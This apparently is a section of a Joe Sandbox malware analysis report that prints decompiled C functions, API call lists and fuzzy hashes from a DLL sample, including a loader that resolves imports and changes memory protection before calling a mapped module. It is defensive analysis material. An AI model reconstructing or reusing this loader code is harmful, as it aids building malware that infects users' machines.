                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ComputerHeapName$AllocateFree
                                                  • String ID:
                                                  • API String ID: 187446995-0
                                                  • Opcode ID: 941b35559f24209fef2c0652ce93e34530d7ade8e90fa06476922e92e2e779ac
                                                  • Instruction ID: c5fd5468858ab30c3575b4f2d0f0a3f5e55862e06a5b41874f1651c31bc0e9c9
                                                  • Opcode Fuzzy Hash: 941b35559f24209fef2c0652ce93e34530d7ade8e90fa06476922e92e2e779ac
                                                  • Instruction Fuzzy Hash: 74F0B423600609FAEB10D69A8E01FAF36EDDBC1744F20006DA914F3100EA72EE038770
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC8055, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xecd23c) == 0) {
						E00EC970F();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xecd23c) == 1) {
						_t10 = E00EC6A56(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                  0x00ec805c
                                                  0x00ec805d
                                                  0x00ec8060
                                                  0x00ec8092
                                                  0x00ec8094
                                                  0x00ec8094
                                                  0x00ec8062
                                                  0x00ec8063
                                                  0x00ec8078
                                                  0x00ec807f
                                                  0x00ec8081
                                                  0x00ec8081
                                                  0x00ec807f
                                                  0x00ec8063
                                                  0x00ec809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(00ECD23C), ref: 00EC806A
                                                    • Part of subcall function 00EC6A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC6A69
                                                  • InterlockedDecrement.KERNEL32(00ECD23C), ref: 00EC808A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 703dbc3b27b01410a69634f12a27d188b74c7b59327d30b7f6e1c69fcda74e18
                                                  • Instruction ID: 176791e3be4566420ebf90ecc376d4fa340e2de72b9c2401ba63c95720395162
                                                  • Opcode Fuzzy Hash: 703dbc3b27b01410a69634f12a27d188b74c7b59327d30b7f6e1c69fcda74e18
                                                  • Instruction Fuzzy Hash: A2E02634244B2197A2302B708F0BF5EA644AF10B88F04702CF688F00B0CE13DC4BC6D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC9318, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 34%
                                                  			E00EC9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xecd27c; // 0x213a5a8
				_t4 = _t15 + 0xece39c; // 0x3008944
				_t20 = _t4;
				_t6 = _t15 + 0xece124; // 0x650047
				_t17 = E00EC9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00EC9FC9(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                  0x00ec9322
                                                  0x00ec9324
                                                  0x00ec932b
                                                  0x00ec932c
                                                  0x00ec932d
                                                  0x00ec932e
                                                  0x00ec9334
                                                  0x00ec9339
                                                  0x00ec9339
                                                  0x00ec9343
                                                  0x00ec9355
                                                  0x00ec935c
                                                  0x00ec938b
                                                  0x00ec935e
                                                  0x00ec9363
                                                  0x00ec9388
                                                  0x00ec9365
                                                  0x00ec9368
                                                  0x00ec936f
                                                  0x00ec937a
                                                  0x00ec9371
                                                  0x00ec9374
                                                  0x00ec9374
                                                  0x00ec937e
                                                  0x00ec937e
                                                  0x00ec9363
                                                  0x00ec9392

                                                  APIs
                                                    • Part of subcall function 00EC9152: SysFreeString.OLEAUT32(?), ref: 00EC9231
                                                    • Part of subcall function 00EC9FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00EC7946,004F0053,00000000,?), ref: 00EC9FD2
                                                    • Part of subcall function 00EC9FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00EC7946,004F0053,00000000,?), ref: 00EC9FFC
                                                    • Part of subcall function 00EC9FC9: memset.NTDLL ref: 00ECA010
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC937E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 397948122-0
                                                  • Opcode ID: b5c78854177dec2ddab688448453b21a89f0ea69e108811ef49c0aff2a759f71
                                                  • Instruction ID: a22b463627bf8c6d67ce2f14a35867d1b9d0572289473d0d8598e6cccd3ee264
                                                  • Opcode Fuzzy Hash: b5c78854177dec2ddab688448453b21a89f0ea69e108811ef49c0aff2a759f71
                                                  • Instruction Fuzzy Hash: 4901B132500159BFCF119FA8CD09EAEBBB8FB44710F11586AE911F21A2D3729956C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401FE7, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E00401FE7(void* __eax, intOrPtr _a4) {

				 *0x404148 =  *0x404148 & 0x00000000;
				_push(0);
				_push(0x404144);
				_push(1);
				_push(_a4);
				 *0x404140 = 0xc; // executed
				L00401BD6(); // executed
				return __eax;
			}



                                                  0x00401fe7
                                                  0x00401fee
                                                  0x00401ff0
                                                  0x00401ff5
                                                  0x00401ff7
                                                  0x00401ffb
                                                  0x00402005
                                                  0x0040200a

                                                  APIs
                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401387,00000001,00404144,00000000), ref: 00402005
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DescriptorSecurity$ConvertString
                                                  • String ID:
                                                  • API String ID: 3907675253-0
                                                  • Opcode ID: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                  • Instruction ID: 64a343feecbe3ef0b73f5dc68f4200e7203235e6a0c8b6df44520468a7cd6f76
                                                  • Opcode Fuzzy Hash: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                  • Instruction Fuzzy Hash: C0C04CF4140300A7E6209F019D4AF05766177E4709F204529F3003A1E093F91094851D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC2049, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC2049(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xecd238, 0, _a4); // executed
				return _t2;
			}




                                                  0x00ec2055
                                                  0x00ec205b

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: bd2f601f70961682bf16b033b36b6eaef32cc40adb831099aeb6cc8b0f511113
                                                  • Instruction ID: af37340a7dc6eaa1afdba61c6f02500b8e99072d2aa6aab8e222df9e985c90bc
                                                  • Opcode Fuzzy Hash: bd2f601f70961682bf16b033b36b6eaef32cc40adb831099aeb6cc8b0f511113
                                                  • Instruction Fuzzy Hash: 5DB01236404100EFCA014B01DD05F05FB21FB54700F104130F20864070C333846AEB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401E11, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E00401E11(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x40414c;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4);
				_t18 = E00401A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E0040125B(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401745(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401179(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401DFC(_t42);
					L8:
					return _t29;
				}
			}














                                                  0x00401e19
                                                  0x00401e1b
                                                  0x00401e37
                                                  0x00401e48
                                                  0x00401e4f
                                                  0x00401ead
                                                  0x00000000
                                                  0x00401e51
                                                  0x00401e51
                                                  0x00401e5b
                                                  0x00401e5f
                                                  0x00401e64
                                                  0x00401e67
                                                  0x00401e6c
                                                  0x00401e70
                                                  0x00401e75
                                                  0x00401e7a
                                                  0x00401e7e
                                                  0x00401e83
                                                  0x00401e84
                                                  0x00401e88
                                                  0x00401e8d
                                                  0x00401e95
                                                  0x00401e95
                                                  0x00401e8d
                                                  0x00401e7e
                                                  0x00401e70
                                                  0x00401e97
                                                  0x00401ea0
                                                  0x00401ea4
                                                  0x00401eae
                                                  0x00401eb4
                                                  0x00401eb4

                                                  APIs
                                                    • Part of subcall function 00401A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                    • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 00401288
                                                    • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 004012BB
                                                    • Part of subcall function 00401745: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                    • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
                                                    • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                    • Part of subcall function 00401179: GetLastError.KERNEL32 ref: 0040122D
                                                  • GetLastError.KERNEL32(?,00401401), ref: 00401E8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                  • String ID:
                                                  • API String ID: 2673762927-0
                                                  • Opcode ID: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                  • Instruction ID: 7a28e5235208ce399f98616bf791f331da11f6e25b936d66cc8c9f92ca0095d4
                                                  • Opcode Fuzzy Hash: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                  • Instruction Fuzzy Hash: 3111CB76600705ABD721ABA5CC80DAF77BCAF89318704417AED01B76A1E7B4ED0687E4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC21CD, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E00EC21CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xecd330;
				E00EC84D5();
				while(1) {
					_t8 = E00EC12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00EC809F(_t14);
					if(_t15 == 0) {
						HeapFree( *0xecd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00EC84D5();
					if(_t19 != 0) {
						_t22 =  *0xecd338; // 0x3009b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                                  0x00ec21d5
                                                  0x00ec21d9
                                                  0x00ec21da
                                                  0x00ec21db
                                                  0x00ec21e0
                                                  0x00ec21e5
                                                  0x00ec21ec
                                                  0x00ec21f3
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec21f5
                                                  0x00ec21fa
                                                  0x00ec21fb
                                                  0x00ec2202
                                                  0x00ec221c
                                                  0x00000000
                                                  0x00ec2204
                                                  0x00ec2204
                                                  0x00ec2206
                                                  0x00ec2209
                                                  0x00ec220d
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec220f
                                                  0x00ec220d
                                                  0x00ec2224
                                                  0x00ec2224
                                                  0x00ec2226
                                                  0x00ec222d
                                                  0x00ec222f
                                                  0x00ec2235
                                                  0x00ec223c
                                                  0x00ec224c
                                                  0x00ec2244
                                                  0x00ec2247
                                                  0x00ec2247
                                                  0x00ec224f
                                                  0x00ec224f
                                                  0x00ec2258
                                                  0x00ec2258
                                                  0x00ec2222
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 00EC84D5: GetProcAddress.KERNEL32(36776F57,00EC21E5), ref: 00EC84F0
                                                    • Part of subcall function 00EC12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00EC12FF
                                                    • Part of subcall function 00EC12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00EC1321
                                                    • Part of subcall function 00EC12D4: memset.NTDLL ref: 00EC133B
                                                    • Part of subcall function 00EC12D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00EC1379
                                                    • Part of subcall function 00EC12D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00EC138D
                                                    • Part of subcall function 00EC12D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00EC13A4
                                                    • Part of subcall function 00EC12D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00EC13B0
                                                    • Part of subcall function 00EC12D4: lstrcat.KERNEL32(?,642E2A5C), ref: 00EC13F1
                                                    • Part of subcall function 00EC12D4: FindFirstFileA.KERNELBASE(?,?), ref: 00EC1407
                                                    • Part of subcall function 00EC809F: lstrlen.KERNEL32(?,00000000,00ECD330,00000001,00EC2200,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#), ref: 00EC80A8
                                                    • Part of subcall function 00EC809F: mbstowcs.NTDLL ref: 00EC80CF
                                                    • Part of subcall function 00EC809F: memset.NTDLL ref: 00EC80E1
                                                  • HeapFree.KERNEL32(00000000,00ECD00C,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#,00ECD00C,?,00EC23E9), ref: 00EC221C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 5895e37ee2639fd45dd82420c0e9bea857b19ed628d8c5e7cf164316606e2be5
                                                  • Instruction ID: fc1e442d1977ee793aa5a1572973385a4f1e59543da8ab1a2e70bb26b4e3ad2b
                                                  • Opcode Fuzzy Hash: 5895e37ee2639fd45dd82420c0e9bea857b19ed628d8c5e7cf164316606e2be5
                                                  • Instruction Fuzzy Hash: B501D236600204AAE7085FEADF81FAA7299EB85364F50203EFE44F6170D6679C439221
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC1262, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00EC1262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00EC9318(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00EC6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0xecd238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}







                                                  0x00ec126a
                                                  0x00ec12bf
                                                  0x00ec12c4
                                                  0x00ec126c
                                                  0x00ec1286
                                                  0x00ec128a
                                                  0x00ec128f
                                                  0x00ec1291
                                                  0x00ec12a1
                                                  0x00ec12ad
                                                  0x00ec1293
                                                  0x00ec1293
                                                  0x00ec1296
                                                  0x00ec129b
                                                  0x00ec129b
                                                  0x00ec1291
                                                  0x00ec128a
                                                  0x00ec12ca

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,00EC743A,?,004F0053,03009388,00000000,?), ref: 00EC12AD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 936b5a614fc38a86845b4c892e37e06453ae6d1043f56bc64e9a395fd9450e1a
                                                  • Instruction ID: e1d21bdf405c6fba5759464bab4819edb3870eaaf10d9d1e89ce6919ca49c116
                                                  • Opcode Fuzzy Hash: 936b5a614fc38a86845b4c892e37e06453ae6d1043f56bc64e9a395fd9450e1a
                                                  • Instruction Fuzzy Hash: F5016236100249FBDB158F44CD01FAE3BA6EB54350F14842CFA15AA171D732D822E710
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC2436, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E00EC2436(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                  0x00ec2436
                                                  0x00ec2443
                                                  0x00ec2444
                                                  0x00ec2445
                                                  0x00ec244c
                                                  0x00ec247a
                                                  0x00ec247b
                                                  0x00ec247e
                                                  0x00ec2484
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec2463
                                                  0x00ec246d
                                                  0x00ec2474
                                                  0x00000000
                                                  0x00ec2465
                                                  0x00ec2468
                                                  0x00ec2488
                                                  0x00ec246a
                                                  0x00ec246a
                                                  0x00000000
                                                  0x00ec246a
                                                  0x00ec2468
                                                  0x00ec248f
                                                  0x00ec2495
                                                  0x00ec2495
                                                  0x00000000

                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 00EC247E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: fef56f54b9cac89e21ec72aa4d0876486ca390c49d50d0fd041cae38f5582c4e
                                                  • Instruction ID: f3a615dd9e57c593ca706bed062e135e45b3a06e3d3e3dcf70b3777af52c3a79
                                                  • Opcode Fuzzy Hash: fef56f54b9cac89e21ec72aa4d0876486ca390c49d50d0fd041cae38f5582c4e
                                                  • Instruction Fuzzy Hash: ACF0F675C01219EBDB04DB94C588AEDB7B8BF04708F1080AEE612A3101D2B55A45CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC2659, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(00EC3C81,?,?,00EC19A9,3D00ECC0,80000002,00EC3C81,00EC8B1E,74666F53,4D4C4B48,00EC8B1E,?,3D00ECC0,80000002,00EC3C81,?), ref: 00EC2679
                                                    • Part of subcall function 00EC1A03: SysAllocString.OLEAUT32(00EC8B1E), ref: 00EC1A1D
                                                    • Part of subcall function 00EC1A03: SysFreeString.OLEAUT32(00000000), ref: 00EC1A5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreelstrlen
                                                  • String ID:
                                                  • API String ID: 3808004451-0
                                                  • Opcode ID: 1d3fdd72b2412cd094f39fd20746abe56c26a7a530ad8e4c85acf61b8b2b60f3
                                                  • Instruction ID: 552d4091756a2c659497567d5a7300ef9e5d9c2c27838332ab7be9b984d624d3
                                                  • Opcode Fuzzy Hash: 1d3fdd72b2412cd094f39fd20746abe56c26a7a530ad8e4c85acf61b8b2b60f3
                                                  • Instruction Fuzzy Hash: 1AE0A57600010DBFCF129F90ED46E9A3F66EB04750F108019FA1924021C7339976EBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00EC4094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00EC4094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
